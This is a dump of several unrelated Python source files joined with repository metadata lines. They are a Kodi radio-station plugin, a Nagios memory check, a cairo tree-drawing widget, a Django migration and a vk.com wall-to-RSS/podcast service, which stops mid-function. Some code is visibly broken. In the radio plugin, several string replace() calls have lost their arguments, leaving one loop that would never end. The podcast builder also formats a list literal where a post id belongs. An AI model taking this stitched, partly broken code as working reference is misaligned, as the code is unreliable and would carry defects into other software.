    """List all episodes from the Spreaker RSS feed as playable items."""
    response = urllib2.urlopen(PODCASTS).read()
    # Flatten so the item regex can match across lines.
    response = response.replace('\n','')

    match = re.compile('<item><title>(.+?)</title><link>.+?</link>.+?<enclosure url="(.+?)</enclosure>').findall(response)

    for name, link in match:
        # Drop the query string from the enclosure URL.
        AddPodcast(clean(name), link.split('?')[0])
def AddPodcast(name, link):
    """Add one podcast episode to the directory, routed to _PLAYPODCAST."""
    thumbnail = ICON#'DefaultPlaylist.png'

    # sys.argv[0] is the plugin base URL; parameters are appended as a query.
    u = sys.argv[0]
    u += '?url=' + urllib.quote_plus(link)
    u += '&mode=' + str(_PLAYPODCAST)
    u += '&name=' + urllib.quote_plus(name)

    liz = xbmcgui.ListItem(name, iconImage=thumbnail, thumbnailImage=thumbnail)
    xbmcplugin.addDirectoryItem(handle = int(sys.argv[1]), url = u, listitem = liz, isFolder = False)
def GetRecent(response):
    """Extract the recently-played artist names from a playlist page.

    Artists appear in the page markup as CCDDDD-coloured bold text.

    @param response: HTML of the playlist page.
    @return: list of artist-name strings, in page order.
    """
    # findall already returns the matches in order; no need to copy them
    # one by one into a second list as the original did.
    return re.compile('color="CCDDDD"><b>(.+?)</b>').findall(response)
def Request():
    """Build the request index: a '0-9' entry plus one folder per letter A-Z."""
    addLetter('0-9')
    for code in range(ord('A'), ord('Z') + 1):
        addLetter(chr(code))
def IsLive():
    """Return True when the currently playing title looks like a live show.

    Live shows cannot take song requests, so callers use this to block the
    request menu. For live show titles see:
    http://ramfm.org/momentum/cyan/guide.php
    """
    try:
        title = xbmc.Player().getMusicInfoTag().getTitle().lower()
    except:
        title = ''

    shows = [
        'Eighties Flash Back',   #Monday
        'Ladies Night',          #Monday - Verified
        'Big Eighties Show',     #Tuesday
        'Night Show',            #Wednesday / Sunday - Verified
        'Dancing Dave',          #Thursday - Verified
        'Eighties Wonderland',   #Friday
        'Happy Hour',            #Saturday
        'Eighties Request',      #Sunday - Verified
        'Chat Request',          #
    ]

    #genre = xbmc.getInfoLabel('MusicPlayer.Genre')
    #xbmc.log('Genre = %s' % genre)

    return any(show.lower() in title for show in shows)
def IsPlayingRAM():
    """Best-effort check that the current playlist item is one of RAM FM's
    stream URLs, as listed in the station's .pls file."""
    try:
        if not xbmc.Player().isPlayingAudio():
            return False

        pl = xbmc.PlayList(xbmc.PLAYLIST_MUSIC)[0]

        # quicknet caches the .pls for 30 minutes.
        resp = quicknet.getURL(URL, 1800)

        # NOTE(review): [:-1] drops the last character of the filename --
        # presumably to tolerate a trailing newline/slash; confirm.
        if pl.getfilename()[:-1] in resp:
            return True
    except:
        pass

    return False
def Exit():
    """Abort this plugin invocation by raising SystemExit (equivalent to
    the original's sys.exit())."""
    raise SystemExit
def IsPlaying(message):
    """Ensure RAM FM is playing before a request can be made.

    If it is not, show *message* and ask whether to start playback or
    quit. Returns True when RAM FM is (now) playing audio.
    """
    if IsPlayingRAM():
        return True

    dialog = xbmcgui.Dialog()
    # NOTE(review): == 1 selects the second (yes-labelled) button, which
    # exits the plugin instead of starting playback -- confirm the label
    # texts (30028/30029) match this wiring.
    if dialog.yesno(TITLE, message, GETTEXT(30027), '', GETTEXT(30028), GETTEXT(30029)) == 1:
        Exit()
        return False

    Play()
    return xbmc.Player().isPlayingAudio()
def RequestLetter(letter):
    """List the requestable tracks whose artist starts with *letter*.

    Scrapes the station's per-letter playlist page. Recently played songs
    or artists are not requestable; depending on the HIDE setting they are
    either omitted or shown as disabled (red) items.
    """
    if not IsPlaying(GETTEXT(30030)):
        return

    if letter == '0-9':
        url = 'http://ramfm.org/momentum/cyan/playlist0.php'
    else:
        url = 'http://ramfm.org/momentum/cyan/playlist%s.php' % letter

    # Cached for 30 minutes.
    response = quicknet.getURL(url, 1800)

    hide = ADDON.getSetting('HIDE').lower() == 'true'

    images = {}
    tracks = []

    # Each track sits in a '<!-- start ...' delimited chunk.
    items = response.split('<!-- start')[1:]

    for item in items:
        # NOTE(review): these replace() calls appear to have lost their
        # original arguments (likely '&amp;'/'&nbsp;'/double-space
        # normalisation) in transit -- verify against upstream before
        # relying on them.
        item = item.replace(' (& ', ' (& ')

        while ' ' in item:
            item = item.replace(' ', ' ')
        item = item.replace(' ', ' ')

        # Classify the chunk: freely requestable, or recently played.
        mode = MODE_FREE
        if '<i>song recently played</i>' in item:
            mode = MODE_IGNORE if hide else MODE_SONG
        if '<i>artist recently played</i>' in item:
            mode = MODE_IGNORE if hide else MODE_ARTIST

        title = None

        if mode == MODE_FREE:
            # Requestable: grab the javascript:request(...) args, title, artist.
            match = re.compile('.+?<a href="javascript:request\((.+?)\)" title="(.+?)">.+?<h2>(.+?)</h2>.+?-->').findall(item)[0]
            info = match[0]
            title = match[1]
            artist = match[2].split('-', 1)[0].strip()
            image = ''
            available = True

        if mode == MODE_ARTIST or mode == MODE_SONG:
            # Recently played: only the reason (info) and names are available.
            match = re.compile('.+?title="(.+?)">.+?<p>(.+?)</p></header></a></section><!-- end song recently played / artists recently played -->').findall(item)[0]
            info = match[0]
            title = match[1].rsplit('(', 1)[0].strip()
            artist = match[1].split('-', 1)[0].strip()
            image = ''
            available = False

        if not title:
            continue

        # Remember a usable image per artist for fallback below.
        if image != 'na.gif':
            images[artist] = image

        tracks.append([artist, title, image, info, available])

    titles = ['']

    tracks.sort()

    for track in tracks:
        artist = track[0]
        title = track[1]
        image = track[2]
        info = track[3]
        available = track[4]

        # Skip duplicate titles.
        if title in titles:
            continue

        titles.append(title)

        # Fall back to a previously seen image for the same artist.
        if image == 'na.gif':
            try: image = images[artist]
            except: pass

        if available:
            addAvailable(title, artist, image, info)
        else:
            addUnavailable(title, artist, image, info)
def clean(name):
    """Normalize a scraped name: fix a known mis-encoded accent, unescape
    the ampersand entity and trim surrounding whitespace."""
    fixed = name.replace('é', 'e').replace('&amp;', '&')
    return fixed.strip()
def addAvailable(title, artist, image, request):
    """Add a requestable track; selecting it fires the request URL (_TRACK).

    *request* is the scraped javascript:request(...) argument string,
    shaped like "songid,'host',...,'port',..." and picked apart
    positionally below.
    """
    #image = 'http://ramfm.org/artistpic/%s' % image.replace(' ', '%20')
    image = ICON

    name = title
    if name.startswith('Request'):
        name = name.split('Request', 1)[-1]
    name = clean(name)

    # Positional parse of the request(...) arguments.
    id = request.split(',')[0]
    ip = request.split('\'')[1]
    port = request.split('\'')[3]

    u = sys.argv[0]
    u += '?url=' + urllib.quote_plus('http://www.ramfm.org/req/request.php?songid=%s&samport=%s&samhost=%s' % (id, port, ip))
    u += '&mode=' + str(_TRACK)

    liz = xbmcgui.ListItem(name, iconImage=image, thumbnailImage=image)
    xbmcplugin.addDirectoryItem(handle = int(sys.argv[1]), url = u, listitem = liz, isFolder = False)
def addUnavailable(title, artist, image, reason):
    """Add a non-requestable (recently played) track as a red, inert item."""
    xbmc.log('title %s' % title)
    xbmc.log('artist %s' % artist)
    xbmc.log('image %s' % image)
    xbmc.log('reason %s' % reason)

    #image = 'http://ramfm.org/artistpic/%s' % image.replace(' ', '%20')
    image = ICON

    name = title + '[I] (%s)[/I]' % reason
    name = '[COLOR=FFFF0000]' + name + '[/COLOR]'
    name = clean(name)

    u = sys.argv[0]
    # NOTE(review): 'mode' here is the module-level global parsed from the
    # invocation, not an item-specific mode -- looks unintentional; verify.
    u += '?mode=' + str(mode)

    liz = xbmcgui.ListItem(name, iconImage=image, thumbnailImage=image)
    xbmcplugin.addDirectoryItem(handle = int(sys.argv[1]), url = u, listitem = liz, isFolder = False)
def getURL():
    """Pick the stream URL matching the configured bitrate from the
    station's .pls file; fall back to the .pls URL itself on any error."""
    kbps = ADDON.getSetting('STREAM')

    # Very old versions stored this setting as a boolean.
    if kbps == 'true': # for backward compatible
        kbps = '192'
    if kbps == 'false': # for backward compatible
        kbps = '64'

    try:
        lines = urllib2.urlopen(URL).readlines()
        for line in lines:
            try:
                items = line.split('=', 1)
                attr = items[0].lower()
                # Find the "TitleN" line containing the bitrate, then
                # return the value of the matching "FileN" line.
                if attr.startswith('title') and kbps in items[1]:
                    attr = attr.replace('title', 'file')
                    for line in lines:
                        if line.lower().startswith(attr):
                            return line.split('=', 1)[-1].strip()
            except:
                pass
    except:
        pass

    return URL
def RequestURL(url):
    """Submit a song request and report the station's verdict to the user."""
    if not IsPlaying(GETTEXT(30030)):
        return

    try: response = urllib2.urlopen(url).read()
    except: return ShowError(GETTEXT(30050))

    failed = 'SongRequester Fail' in response

    if failed:
        # Extract the rejection reason and, when present, the wait time.
        text = re.compile('reason given:<br />(.+?)</font>').findall(response)[0]
        if 'please wait about' in response:
            try:
                wait = re.compile('about (.+?) minutes').findall(response)[0]
                text += '[CR]' + GETTEXT(30049) % str(int(wait))
            except:
                pass
        return ShowError(text)

    DialogOK(GETTEXT(30031), GETTEXT(30032), GETTEXT(30033), GETTEXT(30031))
def ShowError(text):
    """Show *text* as the detail line of the standard error dialog."""
    DialogOK(GETTEXT(30031), GETTEXT(30034), GETTEXT(30035), text)
def Main():
    """Build the root menu and optionally autostart playback."""
    CheckVersion()

    addDir(GETTEXT(30051), _PLAYNOW_HI, False)
    addDir(GETTEXT(30052), _PLAYNOW_MED, False)
    addDir(GETTEXT(30053), _PLAYNOW_LO, False)
    addDir(GETTEXT(30037), _RECORD, False)
    addDir(GETTEXT(30031), _REQUEST, True)
    addDir(GETTEXT(30040), _PODCASTS, True)

    # Autoplay on entry when the PLAY setting is on and nothing is playing.
    play = ADDON.getSetting('PLAY')=='true'
    if play and not xbmc.Player().isPlayingAudio():
        Play()
def addLetter(letter):
    """Add one alphabet-letter folder entry to the plugin directory."""
    icon = ICON#'DefaultPlaylist.png'
    url = '%s?letter=%s&mode=%s' % (sys.argv[0], letter, str(_LETTER))
    item = xbmcgui.ListItem(letter, iconImage=icon, thumbnailImage=icon)
    xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=url, listitem=item, isFolder=True)
def addDir(name, mode, isFolder):
    """Append one menu entry (action or folder) to the plugin directory."""
    label = clean(name)
    icon = ICON
    url = '%s?mode=%s' % (sys.argv[0], str(mode))
    item = xbmcgui.ListItem(label, iconImage=icon, thumbnailImage=icon)
    item.setProperty('Fanart_Image', FANART)
    xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=url, listitem=item, isFolder=isFolder)
def get_params(path):
    """Parse a plugin URL's query string into a dict.

    path -- the plugin invocation URL (sys.argv[2] style), e.g. '?mode=1&letter=A'.
    Returns a dict of percent-decoded key/value pairs; bare keys without a
    value are skipped.
    """
    params = {}
    # Everything after the first '?' is the query string.
    path = path.split('?', 1)[-1]
    pairs = path.split('&')
    for pair in pairs:
        # BUG FIX: split on the first '=' only, so values that themselves
        # contain '=' (e.g. base64 padding) are no longer truncated.
        split = pair.split('=', 1)
        if len(split) > 1:
            params[split[0]] = urllib.unquote_plus(split[1])
    return params
# ---- Entry-point dispatcher: route this plugin invocation on ?mode=N ----
params = get_params(sys.argv[2])
mode = None
try: mode = int(params['mode'])
except: pass
if mode == _PLAYNOW_HI or mode == _PLAYNOW_MED or mode == _PLAYNOW_LO:
    # Persist the chosen quality, then start the live stream.
    ADDON.setSetting('STREAM', str(mode))
    Play()
elif mode == _RECORD:
    Record()
elif mode == _REQUEST:
    # Song requests only make sense while the stream is playing.
    if IsPlaying(GETTEXT(30030)):
        xbmc.sleep(500)
        if IsLive():
            # Requests are disabled while a live show is on air.
            DialogOK(GETTEXT(30031), GETTEXT(30046), GETTEXT(30047), GETTEXT(30048))
            #xbmc.executebuiltin('Container.Update(%s,replace)' % sys.argv[0])
            Exit()
        else:
            Request()
elif mode == _LETTER:
    # Browse requestable tracks by first letter.
    if 'letter' in params:
        RequestLetter(params['letter'])
    else:
        Exit()
elif mode == _TRACK:
    RequestURL(params['url'])
elif mode == _PODCASTS:
    ShowPodcasts()
elif mode == _PLAYPODCAST:
    try:
        name = params['name']
        url = params['url']
        PlayPodcast(name, url)
    except:
        pass
elif mode == MODE_SONG:
    ShowError(GETTEXT(30043))
elif mode == MODE_ARTIST:
    ShowError(GETTEXT(30044))
else:
    # No/unknown mode: show the root menu.
    Main()
xbmcplugin.endOfDirectory(int(sys.argv[1]))
|
JamesLinEngineer/RKMC
|
addons/plugin.audio.ramfm/default.py
|
Python
|
gpl-2.0
| 15,285
|
#!/usr/bin/python
# Copyright (C) 2014 Red Hat Inc
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
#
import sys
import argparse
import sadf
from glusternagios import utils
_sadfMemCommand = ["sadf", "-x", "--", "-r"]
def parse_input():
    """Parse command-line options for the memory check plugin.

    Requires -w/--warning and -c/--critical thresholds (percent of total
    memory) and adds the sadf common options (e.g. sampling interval).
    Returns the parsed argparse namespace.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-w", "--warning", action="store",
                        required=True, type=int,
                        help="Warning threshold in percentage")
    parser.add_argument("-c", "--critical", action="store",
                        required=True, type=int,
                        help="Critical threshold in percentage")
    # Shared sadf flags (interval etc.) come from the sadf helper module.
    sadf.add_common_args(parser)
    args = parser.parse_args()
    return args
def showMemStat(warning, critical, s):
    """Build the Nagios result dict for a memory-usage sample.

    warning, critical -- thresholds in percent of total memory.
    s -- latest sadf sample; expects s['memory'] with 'memfree', 'memused',
         'memused-percent', 'buffers', 'cached' (values in KB) - per the
         sadf -r XML output.
    Returns a dict with 'message' (status + perfdata) and 'exit_status'.
    """
    pl_op = {}
    if not s:
        # No sample at all -> UNKNOWN.
        pl_op["message"] = ("MEMORY STATUS UNKNOWN")
        pl_op['exit_status'] = utils.PluginStatusCode.UNKNOWN
        return pl_op
    try:
        # Total memory = free + used, converted KB -> GB.
        totalMem = utils.convertSize((int(s['memory']['memfree'])
                                      + int(s['memory']['memused'])),
                                     "KB", "GB")
    except (KeyError, ValueError) as e:
        pl_op["message"] = "key: %s not found" % str(e)
        pl_op["exit_status"] = utils.PluginStatusCode.UNKNOWN
        return pl_op
    # Absolute thresholds in GB derived from the percentage arguments.
    crit_value = (totalMem * critical) / 100
    war_value = (totalMem * warning) / 100
    if utils.convertSize(int(s['memory']['memused']),
                         "KB", "GB") >= crit_value:
        pl_op["message"] = utils.PluginStatus.CRITICAL
        pl_op['exit_status'] = utils.PluginStatusCode.CRITICAL
    elif utils.convertSize(int(s['memory']['memused']),
                           "KB", "GB") >= war_value:
        pl_op["message"] = utils.PluginStatus.WARNING
        pl_op['exit_status'] = utils.PluginStatusCode.WARNING
    else:
        pl_op["message"] = utils.PluginStatus.OK
        pl_op['exit_status'] = utils.PluginStatusCode.OK
    try:
        # Append human-readable summary plus Nagios perfdata after the '|'.
        pl_op["message"] += ("- %.2f%% used(%.2fGB out of %.2fGB)|"
                             "Total=%.2fGB;%.2f;%.2f;0;%.2f"
                             " Used=%.2fGB Buffered=%.2fGB"
                             " Cached=%.2fGB" % (
                                 float(s['memory']['memused-percent']),
                                 utils.convertSize(int(s['memory']['memused']),
                                                   "KB", "GB"),
                                 totalMem,
                                 totalMem,
                                 war_value,
                                 crit_value,
                                 totalMem,
                                 utils.convertSize(int(s['memory']['memused']),
                                                   "KB", "GB"),
                                 utils.convertSize(int(s['memory']['buffers']),
                                                   "KB", "GB"),
                                 utils.convertSize(int(s['memory']['cached']),
                                                   "KB", "GB")))
    except (KeyError, ValueError, TypeError) as e:
        pl_op["message"] = "key: %s not found" % str(e)
        pl_op["exit_status"] = utils.PluginStatusCode.UNKNOWN
        return pl_op
    return pl_op
if __name__ == '__main__':
    # Nagios entry point: parse thresholds, fetch the latest sadf memory
    # sample, print the status line and exit with the plugin status code.
    # (Python 2 print statements.)
    args = parse_input()
    if args.critical <= args.warning:
        print "UNKNOWN:Critical must be greater than Warning."
        sys.exit(utils.PluginStatusCode.UNKNOWN)
    try:
        st = sadf.getLatestStat(sadf.sadfExecCmd(_sadfMemCommand),
                                args.interval if args.interval else 1)
    except (sadf.SadfCmdExecFailedException,
            sadf.SadfXmlErrorException) as e:
        print str(e)
        exit(utils.PluginStatusCode.UNKNOWN)
    d = showMemStat(args.warning, args.critical, st)
    # Nagios reads the first stdout line and the process exit status.
    print d["message"]
    sys.exit(d['exit_status'])
|
dealnews/gluster-nagios-addons
|
plugins/memory.py
|
Python
|
gpl-2.0
| 4,532
|
import cairo
import pango
import gtk
from core.world import TheWorld
from ontology.thing import Thing
from widgets.primitives import Primitives
class NodeTree(Thing):
    """Draws a tree of nodes together with parent/child connector lines.

    Rendering can optionally be cached into an offscreen surface; the cache
    is rebuilt whenever the world zoom level changes.
    """
    def __init__(self, root_node):
        Thing.__init__(self)
        self.root_node = root_node
        # running layout cursors used while walking the tree
        self.x_offset = 0.0
        self.y_offset = 0.0
        self.width = 1.5
        self.height = 1.5
        # offscreen-render cache (disabled by default)
        self.cache_drawing_operations = False
        self.cached_render = None
        self.cached_scale = TheWorld.scale
    # TODO - fix rotation for cached bitmaps
    def draw(self, context):
        """Render the whole tree, via the bitmap cache when enabled."""
        Thing.draw(self, context)
        # draw a bounding box
        #Primitives.bounding_box(context, -0.5, -0.5, 1.0, 1.0)
        # set origin to top left
        #context.translate(-0.5 + (self.root_node.width / 2.0), -0.5 + (self.root_node.height / 2.0))
        context.translate(-0.5, -0.5)
        if self.cache_drawing_operations:
            # Check whether the rendering cache needs to be refreshed.
            # BUG FIX: compare the scale by value - the original used
            # 'is not', i.e. float object identity, which is implementation
            # dependent and could wrongly keep or invalidate the cache.
            if (self.cached_render is None) or (self.cached_scale != TheWorld.scale):
                self.cached_render = self.__render_cache(context)
                self.cached_scale = TheWorld.scale
            # blast cached rendering to screen
            context.save()
            pixel_width, pixel_height = context.user_to_device_distance(self.width, self.height)
            context.scale(1.0 / pixel_width, 1.0 / pixel_height)
            context.set_source_surface(self.cached_render)
            context.paint()
            context.restore()
        else:
            # draw connectors first for z-order
            context.save()
            self.x_offset = 0
            self.y_offset = 0
            self.draw_connectors(context, self.root_node)
            self.x_offset = 0
            self.y_offset = 0
            self.draw_nodes(context, self.root_node)
            context.restore()
    def __render_cache(self, context):
        """Render the tree once into a new offscreen surface and return it."""
        pixel_width, pixel_height = context.user_to_device_distance(self.width, self.height)
        print (pixel_width, pixel_height)
        surface = context.get_target().create_similar(cairo.CONTENT_COLOR_ALPHA, int(pixel_width), int(pixel_height))
        #ctx = cairo.Context(surface)
        ctx = gtk.gdk.CairoContext(cairo.Context(surface)) # NB! pango only works with gtk.gdk.CairoContext NOT cairo.Context
        ctx.scale(pixel_width, pixel_height)
        # draw connectors first for z-order
        self.x_offset = 0
        self.y_offset = 0
        self.draw_connectors(ctx, self.root_node)
        self.x_offset = 0
        self.y_offset = 0
        self.draw_nodes(ctx, self.root_node)
        del ctx
        return surface
    def draw_connectors(self, context, node):
        """Depth-first pass: lay out each node and draw its parent link."""
        node.x = self.x_offset * 0.08
        node.y = self.y_offset * 0.04
        # draw connectors
        parents = node.parents()
        if len(parents):
            parent_node = parents[0]
            (x1, y1) = (parent_node.center_x, parent_node.center_y)
            (x2, y2) = (node.center_x, node.center_y)
            context.set_line_width(0.001)
            context.set_source_rgb(0.0, 0.0, 1.0)
            context.move_to(x1, y1)
            context.line_to(x2, y2)
            context.stroke()
        self.x_offset += 1
        if not node.children():
            self.y_offset += 1
        for child in node.children():
            self.draw_connectors(context, child)
        self.x_offset -= 1
    def draw_nodes(self, context, node):
        """Second pass: draw each node on top of the connector lines."""
        context.save()
        # don't need to recalc - already layed out in draw_connectors
        #node.x = self.x_offset * 0.08
        #node.y = self.y_offset * 0.02
        ## draw connectors
        #parents = node.parents()
        #if len(parents):
        #parent_node = parents[0]
        #(x1, y1) = (parent_node.center_x, parent_node.center_y)
        #(x2, y2) = (node.center_x, node.center_y)
        #context.set_line_width(0.002)
        #context.set_source_rgb(0.0, 0.0, 0.5)
        #context.move_to(x1, y1)
        #context.line_to(x2, y2)
        #context.stroke()
        context.translate(node.center_x, node.center_y)
        context.scale(node.width, node.height)
        node.draw(context)
        context.restore()
        #self.x_offset += 1
        #if not node.children():
        #    self.y_offset += 1
        for child in node.children():
            self.draw_nodes(context, child)
        #self.x_offset -= 1
|
antoinevg/survival
|
widgets/asteditor/nodetree.py
|
Python
|
gpl-2.0
| 4,118
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Set a human-friendly plural name for Category and add the required
    ``icon`` CharField to Link, backfilling existing rows with ''."""
    dependencies = [
        ('links', '0001_initial'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='category',
            options={'verbose_name_plural': 'Categories'},
        ),
        migrations.AddField(
            model_name='link',
            name='icon',
            # default='' is only used to populate existing rows;
            # preserve_default=False drops it from the model afterwards.
            field=models.CharField(default='', max_length=32),
            preserve_default=False,
        ),
    ]
|
udragon/webportal
|
links/migrations/0002_auto_20150408_2203.py
|
Python
|
gpl-2.0
| 568
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Microservice for making podcast rss feed from vk.com audiogroup's walls
and rss feeds for aggregators
"""
import os
import re
import sys
from datetime import datetime
from libs.esvk.esvk import esVKWall
from libs.esrss.esrsslite import esRss
import libs.server.bottle as bottle
import libs.server.wsgiserver as wsgiserver
route = bottle.route
response = bottle.response
static = bottle.static_file
# Optional CLI arguments: <port> <host> <url-prefix>, in that order.
if len(sys.argv) >= 4:
    if sys.argv[3]:
        urlpref = sys.argv[3]
    else:
        urlpref = ''
else:
    urlpref = ''
if len(sys.argv) >= 3:
    if sys.argv[2]:
        host = sys.argv[2]
    else:
        host = 'localhost'
else:
    host = 'localhost'
if len(sys.argv) >= 2:
    # BUG FIX: this branch previously tested sys.argv[2], which raises
    # IndexError when only a port is given and ignored whether the port
    # argument itself was set; test sys.argv[1] (the port) instead.
    if sys.argv[1]:
        port = int(sys.argv[1])
    else:
        port = 8080
else:
    port = 8080
audiopostfix = 'vk2podaudio'
# Public base URL of the audio proxy endpoint used in feed enclosures.
if urlpref:
    localaudiourl = 'http://%s/%s' % (urlpref, audiopostfix)
else:
    localaudiourl = 'http://%s:%s/%s' % (host, str(port), audiopostfix)
vw = esVKWall()
def duration(sec):
    """Format a duration in seconds as [H:]MM:SS.

    sec -- duration in seconds (int or numeric string).
    Returns e.g. '01:05' for 65 and '1:01:40' for 3700.
    """
    s = int(sec)
    # '//' keeps integer semantics on both Python 2 and 3 (the original
    # used '/', which yields floats on Python 3 and breaks zfill output).
    dur = str(s // 60 % 60).zfill(2) + ':' + str(s % 60).zfill(2)
    if s >= 3600:
        # BUG FIX: the threshold was 360 (6 minutes), clearly a typo for
        # one hour; only prepend the hour count for durations >= 1 hour.
        dur = str(s // 60 // 60) + ':' + dur
    return dur
def wall2Pod(gname, localaudiourl=localaudiourl, count=20, offset=0):
if gname:
if int(count) > 100:
count = 100
group = vw.getGroup(gname)
if group['is_closed'] == 0:
photo = vw.getBiggestPhoto(group)
if photo:
rss = esRss(title=group['name'], link='http://vk.com/' + gname, description=group['description'], image_url=photo)
else:
rss = esRss(title=group['name'], link='http://vk.com/' + gname, description=group['description'])
items = vw.getWall(gname, count, offset)['response']
if items.has_key('items'):
items = items['items']
for i in items:
content = ''
if type(i) == dict:
if i.has_key('text'):
description = i['text']
if i.has_key('attachments'):
for a in i['attachments']:
for c in a.keys():
if c == 'photo':
description = vw.getBiggestPhoto(a[c], True) + '<br>' + description
for c in a.keys():
if c == 'audio':
if i.has_key('from_id'):
link = 'https://vk.com/wall' + str(i['from_id']) + '_' + str(i['id'])
elif i.has_key('owner_id'):
link = 'https://vk.com/wall' + str(i['owner_id']) + '_' + str(['id'])
else:
link = ''
if link:
if not content:
r = vw.s.get(link)
if r.ok:
content = r.content.replace('\n', ' ')
oa_id = str(a[c]['owner_id']) + '_' + str(a[c]['id'])
dur = re.findall('(?u)play_' + oa_id + '.*?_audio_duration">(.*?)<',
content)
if dur:
dur = ' [%s]' % dur[0]
else:
dur = ''
title = a[c]['artist'] + ' - ' + a[c]['title']
title = title.replace('/', '_')
rss.addItem(title=title + dur, description=description, link=link,
enclosure_url=localaudiourl + '/' + oa_id + '/' + title + '.mp3',
enclosure_type='audio/mpeg', pubDate=datetime.strftime(
datetime.fromtimestamp(int(i['date'])), '%a, %d %b %Y %T'))
return rss.Feed()
else:
print "ERROR: Group is closed"
return ''
def wall2RSS(gname, localaudiourl=localaudiourl, count=20, offset=0):
if gname:
if int(count) > 100:
count = 100
group = vw.getGroup(gname)
if group['is_closed'] == 0:
photo = vw.getBiggestPhoto(group)
if photo:
rss = esRss(title=group['name'], link='http://vk.com/' + gname, description=group['description'], image_url=photo)
else:
rss = esRss(title=group['name'], link='http://vk.com/' + gname, description=group['description'])
items = vw.getWall(gname, count, offset)['response']
if items.has_key('items'):
items = items['items']
for i in items:
if type(i) == dict:
title = ''
description = ''
if i.has_key('text'):
description = i['text']
title = description.split('\n')[0]
if i.has_key('from_id'):
link = 'https://vk.com/wall' + str(i['from_id']) + '_' + str(i['id'])
elif i.has_key('owner_id'):
link = 'https://vk.com/wall' + str(i['owner_id']) + '_' + str(['id'])
else:
link = ''
if i.has_key('attachments'):
for a in i['attachments']:
for c in a.keys():
if c == 'photo':
description += '<br>' + vw.getBiggestPhoto(a[c], True) + '<br>'
if c == 'video':
if a[c].has_key('description'):
description += '<br><a href="%s"><img src="%s"></a><br>%s [VIDEO]' % (link,
vw.getBiggestPhoto(a[c]), a[c]['description'])
else:
description += '<br><a href="%s"><img src="%s"></a><br> [VIDEO]' % (link,
vw.getBiggestPhoto(a[c]))
if c == 'audio':
# if a[c].has_key('duration'):
# dur = duration(a[c]['duration'])
audiotitle = ''
if a[c].has_key('title'):
audiotitle = a[c]['title']
if a[c].has_key('artist'):
if audiotitle:
audiotitle = a[c]['artist'] + ' - ' + audiotitle
else:
audiotitle = a[c]['artist']
title = title.replace('/', '_')
description += '<br><a href="%s">%s</a>' % (localaudiourl + '/' +
str(a[c]['owner_id']) + '_' + str(a[c]['id']) + '/' + audiotitle +
'.mp3', audiotitle)
if c == 'link':
if a[c].has_key('description'):
description += '<br>' + a[c]['description']
if a[c].has_key('title'):
ltitle = a[c]['title']
if not title and len(i['attachments']) == 1:
title = ltitle
else:
ltitle = ''
if a[c].has_key('photo'):
photo = vw.getBiggestPhoto(a[c]['photo'])
if ltitle:
description += '<br><a href="%s"><img src="%s" alt="%s"></a>' % (
a[c]['url'], photo, ltitle)
else:
description += '<br><a href="%s"><img src="%s"></a>' % (
a[c]['url'], photo)
else:
if ltitle:
description += '<br><a href="%s">%s</a>' % (a[c]['url'], ltitle)
if c == 'doc':
if a[c].has_key('title'):
dtitle = a[c]['title']
if a[c].has_key('ext'):
if a[c]['ext'] == u'gif':
photo = '<a href="%s">%s<br><img src="%s" alt="%s"></a>' % \
(a[c]['url'], dtitle, a[c]['url'], dtitle)
if a[c].has_key('preview'):
if a[c]['preview'].has_key('photo'):
if dtitle and not photo:
photo = '<a href="%s">%s<br><img src="%s" alt="%s"></a>' % \
(a[c]['url'], dtitle, vw.getBiggestPhoto(a[c]['preview']['photo']),
dtitle)
else:
if not photo:
photo = '<a href="%s"><img src="%s"></a>' % (a[c]['url'],
vw.getBiggestPhoto(a[c]['preview']['photo']))
else:
photo = ''
else:
photo = ''
if photo:
description += '<br>' + photo
else:
description += '<br><a href="%s">%s</a>' % (a[c]['url'], a[c]['title'])
if not (title and description):
title = '---'
rss.addItem(title=title, description=description, link=link,
pubDate=datetime.strftime(datetime.fromtimestamp(int(i['date'])), '%a, %d %b %Y %T'))
return rss.Feed()
else:
print "ERROR: Group is closed"
return ''
@route('/')
def root():
    """Serve the static landing page."""
    static_root = os.path.join(os.path.curdir, 'static')
    return static(filename='index.html', root=static_root, mimetype='text/html')
@route('/favicon.ico')
def get_favicon():
    """Serve the site's favicon."""
    static_root = os.path.join(os.path.curdir, 'static')
    return static(filename='favicon.ico', root=static_root, mimetype='image/x-icon')
@route('/vk2pod/<query>')
@route('/vk2pod/<query>/<count:re:[0-9]+>')
@route('/vk2pod/<query>/<count:re:[0-9]+>/<offset:re:[0-9]+>')
def vk2podq(query='', count=10, offset=0):
    """HTTP endpoint: podcast feed for vk group *query* (count/offset
    select the wall slice)."""
    if query:
        # BUG FIX: 'xml/application' is not a valid MIME type
        # (types are type/subtype); the intended value is 'application/xml'.
        response.headers['Content-Type'] = 'application/xml'
        return wall2Pod(query, localaudiourl=localaudiourl, count=count, offset=offset)
    else:
        response.headers['Content-Type'] = 'text/plain'
        return 'Empty request'
@route('/vk2rss/<query>')
@route('/vk2rss/<query>/<count>')
@route('/vk2rss/<query>/<count>/<offset>')
def vk2rssq(query='', count=10, offset=0):
    """HTTP endpoint: generic RSS feed for vk group *query* (count/offset
    select the wall slice)."""
    if query:
        # BUG FIX: 'xml/application' is not a valid MIME type
        # (types are type/subtype); the intended value is 'application/xml'.
        response.headers['Content-Type'] = 'application/xml'
        return wall2RSS(query, localaudiourl=localaudiourl, count=count, offset=offset)
    else:
        response.headers['Content-Type'] = 'text/plain'
        return 'Empty request'
@route('/' + audiopostfix + '/<oa_id>', method='GET')
@route('/' + audiopostfix + '/<oa_id>/<title>', method='GET')
def audioStream(oa_id='', title=''):
    """Proxy-stream a vk audio file identified by '<owner>_<id>'.

    title is accepted only so that feed enclosure URLs can end in a
    human-readable '.mp3' filename; it is otherwise unused.
    """
    if oa_id:
